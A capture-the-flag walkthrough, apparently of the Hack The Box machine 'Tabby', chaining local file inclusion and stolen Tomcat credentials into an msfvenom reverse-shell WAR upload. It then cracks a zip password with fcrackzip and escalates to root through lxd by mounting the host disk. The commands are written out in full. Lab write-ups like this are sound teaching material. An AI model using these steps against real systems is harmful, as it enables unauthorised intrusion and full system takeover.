We start with an nmap scan to check what ports are open.
Command: nmap -sC -sV 10.10.10.194
- port 22 SSH
- port 80 HTTP
- port 8080 HTTP
We are going to start with port 80 which is a normal website. But as you can see from the image below, we have a hostname that we should add to /etc/hosts.
Let's start a gobuster scan on port 80 to check for some directories.
Command: gobuster dir -u http://megahosting.htb -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,txt -t 50
I checked the /files directory but we can't access it.
If we go to the NEWS tab it says that there was a data breach. But checking the URL there is something interesting.It looks like that statement is a file and is imported from somewhere.
This could mean only one thing Local File Inclusion (LFI). Let's try some basic LFI.
We know from the nmap scan that there is another HTTP port that has Tomcat on it. Let's check that.
I tried to access the manager webapp and the hostmanager webapp, but I was asked for credentials that I don't have.I also tried for the default credentials, but no luck.
We know that we can do LFI, so let's check the configuration file for Tomcat.
Note: Check this link to know where to find the Tomcat directory on debian systems: https://packages.debian.org/sid/all/tomcat9/filelist
If we access the /usr/share/tomcat9/etc/tomcat-users.xml file via LFI (open the page source to read the content of the file or do it in BurpSuite) we can find some credentials.
With the credentials that we've found, we can access the hostmanager webapp.
But firs we need to create a reverse shell using msfvenom.
Command: msfvenom -p java/jsp_shell_reverse_tcp LHOST= <Your IP> LPORT=<Listening Port> -f war > lol.war
Now we use curl to upload our file
Command: curl -u 'tomcat':'$3****************' -T shell.war 'http://megahosting:8080/manager/text/deploy?path=/shell.war'
All we have to do now is to start a netcat listener and to access the file that we uploaded. Our uploaded file can be found here: http://megahosting:8080/<your shell’s name>/
And we have a shell as user tomcat
We know from he gobuster result that there is a directory named /files. Let's find it and let's see what is inside.
I tried to open the zip file but was password protected so I had to use fcrackzip to crack the password.
Command: fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip
Shell as ash
First we have to initialise lxd
Command: lxd init
Command: git clone https://github.com/saghul/lxd-alpine-builder.git
Now go inside the alpine directory to compile the image.
Command:sudo ./build-alpine
Now send the compiled image to the client's machine.
Add the image to lxd
Command: lxc image import ./alpine-v3.12-x86_64-20201106_1055.tar.gz --alias myimage
Note: If the import fails, move the alpine image to /dev/shm
List the lxd images
Command: lxc image list
Now execute the following commands to get a shell as root
Commands:
- lxc init myimage ignite -c security.privileged=true
- lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
- lxc start ignite
- lxc exec ignite /bin/sh
Comments
Post a Comment